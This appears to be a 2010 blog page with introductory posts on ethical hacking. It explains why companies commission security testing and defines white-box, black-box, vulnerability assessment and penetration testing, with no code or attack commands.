At first it might sound strange that a company would pay someone to try to break into their system. Ethical hacking, though, makes a lot of sense, and it is a concept companies have been employing for years. To test the effectiveness and quality of product, we subject it to the worst case scenario. The safety testing performed by car manufacturers is a good example. Current regulatory requirements including HIPAA, Sarbanes Oxley, and SB-1386 and BS 799 require a trusted third party to check that systems are secure.
In order to get the most out of the assessment, a company should decide in advance the nature of the vulnerabilities they're most concerned with. Specifically, the company should determine which information they want to keep protected and what they're concerned would happen if the information was retrieved by an illegal hacker.
Companies should thoroughly assess the qualifications and background of any Ethical Hacker they are considering hiring. This individual will be privy to highly sensitive information. Total honesty and integrity is of the utmost importance.

Sunday, February 14, 2010

Ethical Hacking

What is Ethical Hacking?

Art and Science of determining vulnerabilities within the existing network architecture. The idea of Ethical hacking is to put yourself in the shoes of the hacker and access and monitor the flaws in your own network. It is used to determine the security flaws in the network before the hacker does by using similar tools and techniques as the hacker. If we go by what history has to tell us, Hackers have always been many steps ahead of network security professionals therefore it definitely makes a lot of sense to be prepared.

Types of Ethical Hacking
White Box: Full knowledge of the system. What this means is that you have full information about the system. i.e. you know what IP the database server is running on and what version of the operating system is running on that box etc. This makes it easy for you to learn about the various details and then fingerprint that very system.

Black Box: You have NO knowledge of the system infrastructure. As a Ethical hacker, this should be the one that can help you see things from a hacker’s perspective as you like the hacker doesnt have any initial knowledge about the system)

Vulnerability Assessment:Usually done by using an automated script. The only negative is that your testing will be as good as your tool. The positive is pretty clear, you run an automated script which covers certain things and you are all set for those covered topics.

Penetration Testing: Comprehensive review of vulnerabilities, how to exploit those vulnerabilities and understanding how networks react to them.

Wednesday, January 20, 2010